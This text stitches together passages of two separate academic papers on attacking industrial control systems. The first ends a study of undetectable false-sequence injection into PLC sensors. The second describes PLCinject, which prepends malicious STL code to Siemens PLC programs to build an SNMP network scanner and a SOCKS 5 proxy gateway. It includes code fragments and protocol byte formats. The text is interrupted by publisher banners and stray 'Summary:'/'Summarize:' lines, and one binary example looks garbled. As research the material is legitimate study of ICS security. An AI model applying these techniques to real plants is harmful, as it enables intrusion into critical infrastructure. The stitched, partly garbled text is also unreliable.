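For a toy two-state automaton A <-> B with the single observed sequence (A, B) and $k = 1$, the only undetectable word up to length 3 is ABA: it is generated by the model but never observed.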
To evaluate the connectivity of the NDAAO, we give the mean number of edges originating from a state. We define the structural complexity metric $C_s$ as:

$C_s = \frac{\sum_{x_i \in X} \deg(x_i)}{|X|}$  (11)

where $\deg(x_i) = |f_{nd}(x_i)|$ is the degree of a state. Similar to the complexity metric, we define the attack vulnerability index to measure the success rate of the false sequences searched from the identified NDAAO:

$C^n_A = \frac{|\bigcup_{x_i \in X} A^n_{x_i}|}{|W^n_{Ident}|}$  (12)

By equations (11) and (12), we obtain the ratio of multiple-branch states among all states and the ratio of false sequences among all identified I/O sequences.

4 Case Study

To demonstrate the feasibility and performance of the proposed false sequence attack, a case study is presented. The considered system is a small goods-sorting system whose function is to sort parcels according to their size. The system has 11 inputs (measurements from the system) and 5 outputs (signals from the PLC to the actuators). Fig. 7 shows the layout of the sorting system.

Figure 7: Sorting system of goods

Figure 8: Part of the NDAAO

The identification database is composed of 50 observed cycles of operation, and every cycle is collected at the time of the arrival of a parcel and its sorting. The vector entries are formed as $[A+, A-, B, C, D, k_1, k_2, a_0, a_1, a_2, b_0, b_1, c_0, c_1, d_0, d_1]$. After the identification process and the reduction of the states, the part of the NDAAO model obtained with identification parameter $k = 2$ is shown in Fig. 8.

From the obtained model, we implement the false sequence search; before simplification we found plenty of false sequences of different lengths that can potentially act as the malicious logic orders of data injected into compromised sensors, such as

$A_1 = Q_{34}\, Q_{21}\, Q_{22}\, Q_{30}$
$A_2 = Q_{32}\, Q_{10}\, Q_{11}\, Q_{12}\, Q_{28}$
$A_3 = Q_{16}\, Q_{17}\, Q_{18}\, Q_{19}\, Q_{20}\, Q_{34}$

where $Q_i$ is the output of each vector of the observed cycles. However, the above sequences require all the compromised sensors if adversaries carry out attacks. So we need to simplify the searched sequences using the event vectors from equation (6); the above sequences are processed as follows:

$A_1 = Q_{34} \xrightarrow{d_1 1,\; b_0 1,\; \{b_0 0,\, d_0 1\}} Q_{30}$
$A_2 = Q_{32} \xrightarrow{d_1 1,\; b_1 1,\; k_2 1,\; \{b_1 0,\, d_0 1\}} Q_{28}$
$A_3 = Q_{16} \xrightarrow{\{k_1 0,\, a_0 0,\, c_1 1,\, d_1 0\},\; a_1 1,\; a_1 0,\; k_2 1,\; \{a_2 1,\, c_1 0\}} Q_{34}$

Here the symbol sets along each arrow, divided by commas, are the sets of single input events between every two vectors of the false sequence. When we ran the goods-sorting process with these false sequences injected, the sorting process produced wrong sorting results without being detected by the fault detection.

From the obtained false sequences, we find that most of them are concentrated at lengths between 19 and 26, so a potentially malicious attack can select from false sequences of such lengths. Fig. 9 shows how the amount of false sequences changes with length under different $k$.

Figure 9: Amount of false sequences changes with length

Figure 10: Relation between $C_s$ and $C^n_A$

Considering the feasibility of the attack, and noting that the larger a state's degree, the more multiple-branch states there are, Fig. 10 shows that as the structural complexity metric $C_s$ (the ratio of multiple-branch states) decreases, the attack vulnerability index (the ratio of false sequences) drops quickly. Hence, we can detect such attacks by adding detection on multiple-branch states without deliberately increasing the identification parameter $k$.

5 Conclusion

In this paper, we have presented the false sequence attack as one way to find undetectable attacks against a control system from the I/O traces of compromised PLCs. The obtained false sequences can be used as malicious logic attacks injected into remote sensors monitored by PLCs to damage the control system.
We have given a complete implementation of the construction of the false sequence attack, including the search algorithm for false sequences. Detection on multiple-branch states can become an effective defense against such attacks. Simulation shows that our method is a practical threat against control systems with fault detection, which illustrates the effectiveness of our proposed approach.
Summary:
It is essential to ensure accurate sensor measurements to safely regulate physical processes in power control systems. Traditional false data injection (FDI) attacks against control systems mainly require the attackers to obtain the optimal malicious inputs. Different from traditional FDI attacks, we present a false sequence attack that can defeat the fault detection protecting Programmable Logic Controllers (PLCs) with only partial information about the victim system. Our attack formulation is to identify a discrete event model from collected fault-free I/O traces of compromised PLCs, and to find the undetectable false sequences, selected from the identified model, that are injected into compromised sensors as the desired attacks. A representative industrial simulation shows that we can construct the false sequence attack against a control system with fault detection.

Key Words: power control system, false sequence attack, false data injection, discrete event model, fault detection
Summarize:
I. INTRODUCTION

Industrial control systems (ICS) are integral components of production and control tasks. Modern infrastructure heavily relies on them. The introduction of the Smart Manufacturing (Industry 4.0) technology stack further increases the dependency on industrial control systems [1]. Modern infrastructure is already under attack and offers a broad attack surface, ranging from simple XSS vulnerabilities [2], [3] to major design flaws in protocols [4], [5]. The canonical example of an attack on an industrial control system is the infamous Stuxnet worm that targeted an Iranian uranium enrichment facility. However, adversaries increasingly target ordinary production systems [6]. A recent example is the forced shutdown of a blast furnace in a German steelworks in 2014. The attackers reportedly gained access to the pertinent control systems via the steelwork's business network [7]. This is a typical attack vector because business networks serve humans, and humans are susceptible to spear phishing. Arguably, spear phishing is easy to carry out when accompanied by research and social engineering. However, in far too many cases, even easier ways exist into industrial control systems. Published scan data shows that thousands of ICS components, for example, programmable logic controllers (PLCs), are directly reachable from the Internet [8], [9], [10]. While only one PLC of a production facility may be reachable in this fashion, the PLC may connect to internal networks with many more PLCs. This is what we call the "deep" industrial network. In this paper, we investigate how adversaries can leverage exposed PLCs to extend their access from the Internet to the deep industrial network.

978-1-4673-7876-5/15/$31.00 2015 IEEE

The approach we take is to turn PLCs into gateways (we focus on Siemens PLCs). This is enabled by a notorious lack of proper means of authentication in PLCs.
A knowledgeable adversary with access to a PLC can download and upload code to it, as long as the code consists of MC7 bytecode, which is the native form of PLC code. We explored the runtime environment of PLCs and found that it is possible to implement several network services using uploaded MC7 code. In particular, we implemented an SNMP scanner for Siemens PLCs, and a fully fledged SOCKS proxy for Siemens PLCs, entirely in Statement List (STL), which compiles to MC7 bytecode. Our scanner and proxy can be deployed on a PLC without service interruption to the original PLC program, which makes it unlikely that unsuspecting operators will notice the infection. In order to demonstrate and analyze deep industrial network intrusion, we developed a proof-of-concept tool called PLCinject. Based on our proof of concept, we analyzed whether the augmentation of the original code with our PLC malware led to measurable effects that might help detect such augmentations. We looked at timing effects, specifically. We found that augmented code is distinguishable from unaugmented code, that is, statistically significant timing differences exist. The difference is minor in absolute terms, that is, the augmentation does not likely affect a production process and hence it will not be noticeable unless network operators actively monitor for malicious access. The downside is that operators of industrial networks must include PLCs in their vulnerability assessment procedures, and they must actively monitor internal networks for malicious network traffic that originates from their own PLCs. Moreover, adversaries can leverage our approach to attack a company's business network from the industrial network. This means that network administrators must guard their business networks from the front and the back. The remainder of this paper is organized as follows. We begin with a discussion of work related to ours in II.
In III, we give technical background for readers unfamiliar with industrial control systems. We describe our attack and intrusion methods in IV. In VI, we discuss mitigations, and VII concludes the paper.

II. RELATED WORK

Various attacks on PLCs have been published. Most attacks target the operating systems of PLCs. In contrast, we leverage the abilities of logic programs running on the PLCs; as such, we do not use any unintended functionality. In the following, we compare our approach to well-known (code) releases and published attacks that manipulate logic code.

Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply.
1st Workshop on Security and Privacy in Cybermatics (SPiCy 2015)

Figure 1: Automation pyramid, adopted from [15]

One of the most cited SCADA attack descriptions is Beresford's 2011 Black Hat USA release [5]. He demonstrated how credentials can be extracted from remote memory dumps. In addition, he showed how to start and stop PLCs through replay attacks. In contrast to our work, he does not alter the logic program on the PLC. In 2011, Langner released "A timebomb with fourteen bytes" [11], wherein he describes how to inject rogue logic code into PLCs. He borrows the same code-prepending technique from Stuxnet as we do. He conceptualizes how to take control away from the original code. In contrast, our program runs in parallel to the original code with the goal of not interfering with the original code's execution. An attack similar to Langner's was presented at Black Hat USA 2013 by Meixell and Forner [12]. In their release, they describe different ways of exploiting PLCs, among them ways to remove safety checks from logic code. Again, our approach differs as we add new functionality while preserving original functionality.
To the best of our knowledge, the first academic paper on PLC malware was published by McLaughlin in 2011 [13]. In this work, he proposes a basic mechanism for dynamic payload generation. He presents an approach based on symbolic execution that recovers boolean logic from PLC logic code. From this, he tries to determine unsafe states for the PLC and generates code to trigger one of these states. In 2012, McLaughlin published a follow-up paper [14], which extends his approach in a way that automatically maps the code to a predefined model by means of model checking. With his model, he can specify a desired behaviour and automatically generate attack code. In his work, McLaughlin focuses on manipulating the control flow of a PLC. We, in contrast, use the PLC as a gateway to the network and leave its original functions untouched.

III. INDUSTRIAL CONTROL SYSTEMS

Figure 1 illustrates the structure of a typical company that uses automation systems. Industrial control systems consist of several layers. At the top are enterprise resource planning (ERP) systems, which hold the data about currently available resources and production capacities. Manufacturing execution systems (MES) are able to manage multiple factories or plants and receive tasks from ERP systems. The systems below the MES are located in the factory. Supervision, control and data acquisition (SCADA) systems control production lines. They provide data about the current production state and they provide means for intervention. The devices holding the logic for production processes are called programmable logic controllers (PLC). We explain them in more detail in section III-A.

Figure 2: Overview of program execution, extracted from [17]
Human machine interfaces (HMI) display the current progress and allow operators to interact with the production process.

A. PLC Hardware

A PLC consists of a central processing unit (CPU) which is attached to a number of digital and analog inputs and outputs. A PLC program, stored on the integrated memory or on an external Multi Media Card (MMC), defines how the inputs and outputs are controlled. A special feature of a PLC is the guarantee of a defined execution time to control time-critical processes. For communication or special-purpose applications, the functionality of a CPU can be extended with modules. The Siemens S7-314C-2 PN/DP we use in our experiments has 24 digital inputs, 16 digital outputs, 5 analog inputs, 2 analog outputs and an MMC slot. It is equipped with 192 KByte of internal memory, of which 64 KByte can be used for permanent storage. Additionally, the PLC has one RS485 and two RJ45 sockets [16].

B. PLC Execution Environment

Siemens PLCs run a real-time operating system (OS), which initiates the cycle time monitoring. Afterwards, the OS cycles through four steps (see figure 2). In the first step, the CPU copies the values of the process image of outputs to the output modules. In the second step, the CPU reads the status of the input modules and updates the process image of input values. In the third step, the user program is executed in time slices with a duration of 1 ms. Each time slice is divided into three parts, which are executed sequentially: the operating system, the user program and the communication. The number of time slices depends on the current user program. By default, the time should be no longer than 150 ms; an engineer can configure a different value. If the defined time expires, an interrupt routine is called. In the common case, the CPU returns to the start of the cycle and restarts the cycle time monitoring [17].
C. Software

Siemens provides its Total Integrated Automation (TIA) portal software to engineers for the purpose of developing PLC programs. It consists of two main components: STEP7 as the development environment for PLCs and WinCC to configure HMIs. Engineers are able to program PLCs in Ladder Diagram (LAD), Function Block Diagram (FBD), structured control language (SCL) and Statement List (STL). In contrast to the text-based SCL and the assembler-like STL, the LAD and FBD languages are graphical. PLC programs are divided into units of organization blocks (OB), functions (FC), function blocks (FB), data blocks (DB), system functions (SFC), system function blocks (SFB) and system data blocks (SDB). OBs, FCs and FBs contain the actual code, while DBs provide storage for data structures and SDBs hold current PLC configurations. For internal data storage addressing, the prefix M for memory is used.

D. PLC Programs

A PLC program consists of at least one organization block called OB1, which is comparable to the main function in a traditional C program. It is called by the operating system. There exist more organization blocks for special purposes, for example, OB100. This block is called once when the PLC starts and is usually used for the initialization of the system. Engineers can encapsulate code by using functions and function blocks; the only difference is an additional DB as a parameter when calling an FB. The SFCs and SFBs are built into the PLC; their code cannot be inspected. The STEP7 software knows which SFCs and SFBs are available based on hardware configuration steps. The following examples give an overview of the programming languages SCL, LAD and STL. Each example shows the same configuration of three inputs and one output. First, the CPU performs a logical AND operation of inputs %I0.0 and %I0.1.
Next, it calculates a logical OR operation of the outcome and the input %I0.2. The result is written to output %Q0.0, which sets the logical value on the connected wire in the next cycle. The first example represents the described program in STL. This is done in four assembler-like instructions; each line defines one instruction.

A %I0.0
A %I0.1
O %I0.2
= %Q0.0

The next example shows the same program in the text-based language SCL. This program can be expressed in one line.

%Q0.0 := (%I0.0 AND %I0.1) OR %I0.2;

The graphical example needs the help of STEP7. Inputs and outputs are positioned through drag & drop on the wire. New connections can be made at predefined positions by selecting the wire tool from the toolbar. Figure 3 shows the graphical representation of our example program.

Figure 3: Function block diagram example

The following description can also be found in the Siemens manual delivered with the PLC [18]. The CPU has several registers used for execution and current state. For binary operations, the status word register is important; all binary operations influence this register. For calculations, the CPU uses up to four accumulator registers of 32 bits width. They are organized like a stack, and it is possible to address each byte of the top register independently. Before a new value is loaded into accumulator one, the current value is copied to accumulator two. To add two numbers, the values have to be loaded successively into the accumulator registers before the +D operation is called. The result is written back into accumulator one. In STL, the program looks as follows.

L  DW#16#1    // ACCU1 = 1
L  DW#16#2    // ACCU1 = 2, ACCU2 = 1
+D            // ACCU1 = ACCU1 + ACCU2

Code which is used multiple times in the program should be implemented as functions. These functions can be called from every point in the code. The CALL instruction allows a jump into the defined function.
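The accumulator mechanics described above can be sketched in a few lines; this is a simplified illustration (class and method names are ours), modeling only the load-push and +D behavior:

```python
class Accu:
    """Tiny sketch of the S7 accumulator behaviour: a load (L) pushes
    ACCU1 into ACCU2, and +D adds ACCU2 to ACCU1."""
    def __init__(self):
        self.accu1 = 0
        self.accu2 = 0

    def load(self, value):   # L <value>
        self.accu2 = self.accu1
        self.accu1 = value

    def add_d(self):         # +D
        self.accu1 = self.accu1 + self.accu2

cpu = Accu()
cpu.load(1)   # L DW#16#1 -> ACCU1 = 1
cpu.load(2)   # L DW#16#2 -> ACCU1 = 2, ACCU2 = 1
cpu.add_d()   # +D        -> ACCU1 = 3
```

After the three instructions, ACCU1 holds the sum 3, mirroring the STL example above.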
The necessary parameters are defined in the called function's header and have to be specified below every CALL instruction.

CALL FC1
  VAR1 := 1
  VAR2 := W#16#A

As mentioned earlier, the only difference between function blocks and functions is a reference to the corresponding data block. In many cases, the program needs storage assigned to a specific function to read constants or save process values. It is unusual to put constants directly into the code, because the code would have to be recompiled after every change; in contrast, data blocks can be manipulated easily, even remotely. A function block call looks as follows.

CALL FB1, %DB1
  VAR1 := 1
  VAR2 := W#16#A

Both function types can define different parameters: IN, OUT, IN_OUT, TEMP and RET_VAL. An FB's STAT parameters are stored in its data block, which is passed as an additional argument. The TEMP type declares local variables that are only available within the function. The other types are self-explanatory.

E. Binary Representation of PLC Programs

All code, written in any of the languages, is compiled into MC7. The opcode length of MC7 instructions is variable, and the encoding of parameters differs between many instructions. The binary representation of the example program from the section before looks as follows.

00100000 00110000 0112 0000 41100000
A %I0.0
A %I0.1
O %I0.2
= %Q0.0

F. Network Protocol

Siemens PLCs use the proprietary S7Comm protocol for transferring blocks. It is a remote procedure call (RPC) protocol based on TCP/IP and ISO over TCP. Figure 4 illustrates the encapsulation of the protocols.
The protocol provides the following functionality:

System State List (SSL) request
List available blocks
Read/write data
Block info request
Up-/download block
Transfer block into filesystem
Start, stop and memory reset
Debugging

Executing one of these functions requires an initialized connection. After a regular TCP handshake, the ISO over TCP setup is performed to negotiate the PDU size. In the S7Comm protocol, the client has to provide, in addition to its preferred PDU size, the rack and slot of the CPU (see connection setup in figure 5). The CPU responds with its preferred PDU size, and both agree to continue with the minimum of both values. After this initialization, the client is able to invoke the functions on the CPU. Figure 5 shows the packet order of a download block function, including the transfer into the filesystem. The PLC controls the download process after receiving the download request. The number of download block requests depends on the length of the block and the PDU size. The end is signaled with the download end request. After receiving the acknowledgement, the PLC waits for further requests. Finally, the transferred block should be persisted by calling the PLC control request; with the destination filesystem P as parameter, the CPU stores the block and executes it. The upload process is similar. The engineering workstation (EWS) requests the upload of a specific block and waits for the acknowledgement. After receiving the acknowledgement without errors, the EWS starts requesting the block; the responses contain the data of the block. The EWS repeats the procedure until the whole block has been transferred. The end is signaled with an upload end request. The transferred blocks are structured and consist of a header, a data part and a footer. Table I shows the structure of the known bytes. The footer contains information about the parameters used for calling the function.
Not every byte of the header and footer is well known, but we have identified the necessary areas to understand the content.

Table I: Block structure, adopted from code [20]
Description | Bytes | Offset
Block signature | 2 | 0
Block version | 1 | 2
Block attribute | 1 | 3
Block language | 1 | 4
Block type | 1 | 5
Block number | 2 | 6
Block length | 4 | 8
Block password | 4 | 12
Block last modified date | 6 | 16
Block interface last modified date | 6 | 22
Block interface length | 2 | 28
Block segment table length | 2 | 30
Block local data length | 2 | 32
Block data length | 2 | 34
Data (MC7 / DB) | x | 36
Block signature | 1 | 36+x
Block number | 2 | 37+x
Block interface length | 2 | 39+x
Block interface blocks count | 2 | 41+x
Block interface | y | 43+x

IV. ATTACK DESCRIPTION

The search engine SHODAN shows that thousands of industrial control systems are directly accessible via the Internet [8], [10]. As shown in chapter III, it is possible to download and upload the PLC program code. This enables attackers to manipulate the logic code of the PLCs that read inputs and outputs. Furthermore, the PLC offers a system library [21] which contains functions to establish arbitrary TCP/UDP communication. An attacker can use the full TCP/UDP support to scan the local production network behind the Internet-facing PLC. Furthermore, he can leverage this PLC as a gateway to reach all the other production or network devices. Like Stuxnet, we prepend the attacker's code to the existing logic code of the PLC. The malicious code is executed at the very beginning of OB1 in addition to the normal control code; hence the PLC is not disturbed in its function. The easiest way is to download the OB1 of a Siemens PLC and add a CALL instruction to an arbitrary function under our control, in our example a function called FC666. Then the patched OB1, FC666 and additional blocks are uploaded to the PLC. Figure 7 illustrates the code injection process.
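The fixed 36-byte header layout of Table I can be decoded with a short parser; this is a sketch under our own naming, where the big-endian byte order is an assumption not stated in the table:

```python
import struct

# Field sizes and offsets taken from Table I (fixed header only);
# ">" (big-endian) is an assumption of this sketch.
HEADER = struct.Struct(">2s4BHI4s6s6s4H")

def parse_block_header(buf):
    """Unpack the fixed 36-byte block header into a dict (sketch)."""
    (signature, version, attribute, language, block_type, number, length,
     password, modified, iface_modified, iface_len, seg_len, local_len,
     data_len) = HEADER.unpack_from(buf)
    return {"signature": signature, "type": block_type, "number": number,
            "length": length, "data_length": data_len}
```

The MC7 or DB data then starts at offset 36 and runs for `data_length` bytes, followed by the footer fields at offsets 36+x onward.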
With the next execution cycle of the PLC, the newly uploaded program including the attacker's code will be executed without any kind of service disruption. This process enables the attacker to run any additional malicious code on the PLC. With this paper we publish a tool called PLCinject that automates this process [22]. Having these capabilities, an attacker is able to execute the attack cycle shown in figure 6. In step one the attacker injects an SNMP scanner that runs in addition to the normal control code of the PLC. After a full SNMP scan of the local network (step two), the attacker can download the scan results from the PLC (step three). The attacker now has an overview of the network behind the Internet-facing PLC. The attacker removes the SNMP scanner and injects a SOCKS proxy into the PLC logic program (step four). This enables the attacker to reach all PLCs in the local production network via the compromised PLC, which acts as a SOCKS proxy. In the next two sections we explain the implementation of the SNMP scanner and the SOCKS proxy. We will not explain every operation and system function in detail; for a complete description of those we refer to [18] and [21].
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply.
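The four-step attack cycle can be summarized in pseudocode. Note that `inject`, `read_db`, and `remove` are hypothetical stand-ins for PLCinject-style operations, not a real API:

```python
def attack_cycle(plc, inject, read_db, remove):
    """Hypothetical orchestration of the attack cycle (figure 6).

    The three callables are stand-ins for PLCinject-style helpers,
    not functions from the published tool.
    """
    inject(plc, "snmp_scanner")        # step 1: prepend the scanner to OB1
    # step 2: the scan runs inside the PLC's normal execution cycle
    results = read_db(plc, "scan_db")  # step 3: download the scan results
    remove(plc, "snmp_scanner")        # step 4: swap scanner for the proxy,
    inject(plc, "socks_proxy")         #         turning the PLC into a gateway
    return results
```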
1st Workshop on Security and Privacy in Cybermatics (SPiCy 2015)

Figure 4: Packet encapsulation, adopted from [19]. (TCP/IP header; ISO over TCP: TPKT and COTP; S7 PDU: S7 telegram header, parameters, parameter data, data.)

Figure 5: Download block sequence diagram. (EWS and PLC: connection setup with PDU sizes 512/240; download request/ack; download block/ack with data; download end/ack; PLC control "insert block into filesystem P"/ack.)

A. SNMP Scanner

Siemens PLCs cannot be used as a TCP port scanner because the TCP connection function TCON cannot be aborted until the function has established a connection. Furthermore, it is only possible to run eight TCP connections in parallel on a Siemens S7-300 PLC. Consequently, the PLC is only able to perform a TCP scan until eight unsuccessful connection attempts have occurred. This limitation does not apply to stateless UDP connections. That is why we use the UDP-based Simple Network Management Protocol (SNMP). SNMP version 1 is defined in RFC 1157 [23] and was developed for monitoring and controlling network devices. A lot of network devices and most of the Siemens Simatic PLCs have SNMP enabled by default. Siemens PLCs are very communicative if SNMP is enabled. By reading the SNMP sysDesc object with the OID 1.3.6.1.2.1.1.1, the Siemens PLC will transmit its product type, product model number, and hardware and firmware version, as shown in the following SNMP response: Siemens, SIMATIC S7, CPU314C-2 PN/DP, 6ES7 314-6EH04-0AB0, HW: 4, FW: V3.3.10. The system description is very useful for matching discovered PLCs against vulnerability and exploit databases. The firmware of PLCs is not patched very often. There are mainly two reasons: On the one hand, a PLC firmware patch will interrupt the production process, which causes a negative monetary impact.
On the other hand, a firmware patch of the PLC can lead to a loss of the production certification or other kinds of quality assurance that are important for the customers of the manufacturing company. That is why the probability of finding a Siemens PLC with a known vulnerability is very high. The SNMP scanner can be broken down into the following steps:

1) Get local IP and subnet
2) Calculate IPs of the subnet
3) Set up UDP connection
4) Send SNMP request
5) Receive SNMP responses
6) Save responses in a DB
7) Stop scanning and disconnect UDP connection

As described in Section III, programming a PLC is quite different from normal programming with, e.g., the C language on an x86 system. Each PLC program is executed cyclically. That is, the state of the program must be saved after each step with condition variables. For reasons of comprehensibility we will only explain steps one to three. Figure 8 shows a code snippet of step one that calls the RDSYSST function. The RDSYSST function reads the internal System State List (SSL) of the Siemens PLC to obtain the PLC's local IP. SSL requests are normally used for diagnostic purposes. Lines 14 and 15 will end the function in case the RDSYSST function is busy. Figure 9 shows how the program calculates the first local IP. This is done by a bitwise logical AND of the PLC's local IP address with its subnet mask, which returns the start address of the local network address range (lines 24-30). Now the SNMP scanner needs to know how often it must increment the IP address to cover the whole local subnet. Therefore we XOR the subnet mask with 0xFFFFFFFF (lines 35-39). The result is the number of IP addresses in the subnet. Figure 10 shows how to set up a UDP connection in STL. At first we need to call the TCON function with special parameters in our TCON_PAR_SCAN data block.
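The address arithmetic just described (AND with the subnet mask, XOR with 0xFFFFFFFF) can be mirrored in a few lines of Python. This is our own illustration; the STL code operates on raw 32-bit double words from a data block:

```python
import ipaddress

def first_ip(local_ip: str, subnet_mask: str) -> str:
    # Bitwise AND of the IP with its subnet mask yields the start
    # address of the local network address range (cf. figure 9).
    ip = int(ipaddress.IPv4Address(local_ip))
    mask = int(ipaddress.IPv4Address(subnet_mask))
    return str(ipaddress.IPv4Address(ip & mask))

def num_hosts(subnet_mask: str) -> int:
    # XOR of the mask with 0xFFFFFFFF gives the number of addresses
    # the scanner has to iterate over above the start address.
    mask = int(ipaddress.IPv4Address(subnet_mask))
    return mask ^ 0xFFFFFFFF

print(first_ip("10.0.0.3", "255.255.255.0"))  # 10.0.0.0
print(num_hosts("255.255.255.0"))             # 255
```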
In the case of UDP, the TCON function does not set up a connection; this is only done in the case of TCP, because TCP is connection oriented in contrast to UDP. But calling the TCON function once is not enough. The connection function will start to work when the #connect variable rises from 0 to 1 between two calls of the function. That is why we programmed a toggle after the first appearance of the connect function (lines 10-11). This will change the #connect value from false to true after TCON has been called the first time in a cycle. The TCON function will detect a rising signal edge on its call in the next cycle and will then be executed.

Figure 6: Attack cycle. (a) The attacker abuses the PLC to scan the local network for SNMP devices. (b) Now he can use the PLC as a gateway into the local network.

Figure 7: Scheme of patching the PLC's program. (a) Original program. (b) Patched program: a CALL to FC666 is prepended to OB1; the red blocks are added by PLCinject.

0001 get_ip: NOP 1
0002
0003 // read ip from system state list (SZL)
0004 CALL RDSYSST
0005      REQ        := TRUE
0006      SZL_ID     := W#16#0037
0007      INDEX      := W#16#0000
0008      RET_VAL    := #sysst_ret
0009      BUSY       := #sysst_busy
0010      SZL_HEADER := "DB".szlheader.SZL_HEADER
0011      DR         := "DB".ip_info
0012
0013 // wait until SZL read finished
0014 A    #sysst_busy
0015 BEC
0016
0017 SET
0018 S

Figure 8: Get the PLC's local IP
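The edge-triggered behaviour of TCON's REQ input can be imitated off-PLC with a small helper (our own sketch, not part of the scanner): the wrapped action fires only in the cycle where the signal goes from 0 to 1.

```python
class RisingEdge:
    """Fire only when the input rises from False to True between two
    consecutive cycles, mimicking the #connect toggle for TCON's REQ."""

    def __init__(self):
        self.prev = False

    def __call__(self, signal: bool) -> bool:
        fired = signal and not self.prev  # rising edge detected this cycle
        self.prev = signal                # remember the level for next cycle
        return fired

edge = RisingEdge()
# low, toggled high -> fires exactly once, then stays quiet while high
print([edge(s) for s in (False, True, True, True)])  # [False, True, False, False]
```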
The next step is to send the UDP-based SNMP packets and receive the responses. This is done by calling the functions TUSEND and TURCV. After the SNMP scan has been completed, all data is stored in a data block which can be downloaded by the attacker (step 3).

0020 // calc first ip of local network
0021 // L "DB".ip_info.local_ip
0022 OPN  "DB"
0023 L    %DBD406
0024 // L "DB".ip_info.subnet
0025 L    %DBD410
0026 AD
0027 // T "DB".ADDRESS.rem_ip_addr
0028 T    %DBD64
0029
0030 //
0031 // get number of hosts from subnet
0032 L    %DBD410
0033 L    DW#16#FFFFFFFF
0034 XOD
0035 T    #num_hosts

Figure 9: Calculate the local net's first IP and the maximal number of hosts

0001 CALL TCON, "TCON_DB_SCAN"
0002      REQ     := #connect
0003      ID      := 1
0004      DONE    := #con_done
0005      BUSY    := #con_busy
0006      ERROR   := #con_error
0007      STATUS  := #con_status
0008      CONNECT := "DB".TCON_PAR_SCAN
0009
0010 AN   #connected
0011 S    #connect

Figure 10: Setup a UDP connection

B. SOCKS 5 Proxy

Once the attacker has discovered all SNMP devices, including the local PLCs, the next step is to connect to them. This can be accomplished by using the accessible PLC as a gateway into the local network. To achieve this we chose to implement a SOCKS 5 proxy on the PLC. This has two main reasons: First, the SOCKS protocol is quite lightweight and easy to implement. Furthermore, all applications can use this kind of proxy: either they are SOCKS aware and can be configured to use one, or a so-called proxifier is used to add SOCKS support to arbitrary programs. The SOCKS 5 protocol is defined in RFC 1928 [24].
An error-free TCP connection to a target through the proxy consists of the following steps:

1) The client connects via TCP to the SOCKS server and sends a list of supported authentication methods.
2) The server replies with one selected authentication method.
3) Depending on the selected authentication method, the appropriate sub-negotiation is entered.
4) The client sends a connect request with the target's IP.
5) The server sets up the connection and replies. All subsequent packets are tunneled between client and target.
6) The client closes the TCP connection.

Our implementation offers the minimal necessary functionality. It supports no authentication, so we can skip step 3. We also do not support proper error handling, and only TCP connects with IPv4 addresses are supported. Once the client has connected, we expect this message flow:

1) Client offers authentication methods: any message, typically 0x05 <authcount=n> (1 byte) <authlist> (n bytes).
2) Server chooses authentication method: 0x05 0x00 (perform no authentication).
3) Client wants to connect to target: 0x05 0x01 0x00 0x01 <ip> (4 bytes) <port> (2 bytes).
4) Server confirms connection: 0x05 0x00 0x00 0x01 0x00 0x00 0x00 0x00 0x00 0x00.
5) Client and target can now communicate through the connection with the server.

0002 JL   lend
0003 JU   bind             // state 0
0004 JU   negotiate        // state 1
0005 JU   authenticate     // state 2
0006 JU   connect_request  // state 3
0007 JU   connect          // state 4
0008 JU   connect_confirm  // state 5
0009 JU   proxy            // state 6
0010 JU   reset            // state 7
0011 lend: JU end

Figure 11: Jump list for the states of SOCKS 5

0005 CALL TRCV, "TRCV_client_DB"
0006      EN_R     := TRUE
0007      ID       := W#16#0001
0008      LEN      := 0
0009      NDR      := #rcv_ndr
0010      BUSY     := #rcv_busy
0011      ERROR    := #rcv_error
0012      STATUS   :=
0013      RCVD_LEN :=
0014      DATA     := "buffers".rcv
0015
0016 A    #rcv_ndr
0017 AN   #rcv_busy
0018 AN   #rcv_error
0019 JC   next_state

Figure 12: Receive the client's authentication negotiation
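The expected message flow can be reproduced byte for byte with a few helper functions. This is our own sketch against RFC 1928, not the PLC-side code:

```python
import socket
import struct

def method_offer() -> bytes:
    # Step 1: VER=5, one offered method, 0x00 = "no authentication".
    return b"\x05\x01\x00"

NO_AUTH_REPLY = b"\x05\x00"  # step 2: server selects "no authentication"

def connect_request(ip: str, port: int) -> bytes:
    # Step 3: VER, CMD=CONNECT, RSV, ATYP=IPv4, DST.ADDR, DST.PORT.
    return b"\x05\x01\x00\x01" + socket.inet_aton(ip) + struct.pack(">H", port)

def success_reply() -> bytes:
    # Step 4: REP=0x00 (succeeded); BND.ADDR and BND.PORT are zeroed,
    # as in the minimal implementation described above.
    return b"\x05\x00\x00\x01" + b"\x00" * 6

print(connect_request("10.0.0.3", 102).hex())  # 050100010a0000030066
```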
As previously mentioned, programs on the PLC are executed cyclically. This is why we use a simple state machine to handle the SOCKS protocol. We number each state and use a jump list to execute the corresponding code block, see figure 11. A state transition is achieved by incrementing the state number, which is persisted in a data block. A description of each state and its actions follows:

bind - On first start the program has to bind and listen to SOCKS port 1080. This is accomplished by using the system function TCON in passive mode. We stay in this state until a partner connects to this port.

negotiate - We wait until the client sends any message. This is done with the function TRCV, which is enabled with the EN_R argument, see figure 12.

authenticate - After the first message we send a reply which tells the client to perform no authentication. For this purpose we use the TSEND system function. In contrast to TRCV, this function is edge controlled, which means the parameter REQ has to change from FALSE to TRUE between consecutive calls to activate sending. As shown in figure 13, we toggle a flag and call TSEND twice to produce a rising edge on REQ.

0008 CALL TSEND, "TSEND_client_DB"
0009      REQ    := #authenticate
0010      ID     := W#16#0001
0011      LEN    := 2
0012      DONE   := #snd_done
0013      BUSY   := #snd_busy
0014      ERROR  := #snd_error
0015      STATUS :=
0016      DATA   := "buffers".snd
0017
0018 AN   #authenticate
0019 S    #authenticate
0020 JC   authenticate
0021
0022 A    #snd_done
0023 AN   #snd_error
0024 AN   #snd_busy
0025 JC   next_state

Figure 13: Respond that no authentication is necessary

connect_request - We then expect the client to send a connection setup message containing the target IP and port number, which is stored for the next state.
connect - We set up the connection to the target with TCON.

connect_confirm - When the connection to the target is established, we send the confirmation message to the client.

proxy - Now we simply tunnel the connections between client and target. All data received from the client with TRCV is stored in a buffer which is reused to feed the TSEND function for sending data to the target. The same principle applies to the opposite direction, but we have to consider that sending messages can take a couple of cycles. Therefore a second buffer is used to ensure that no messages are mixed or lost. A disconnect is signaled with the error flag of TRCV. When this occurs we send the last received data and then go to the next state.

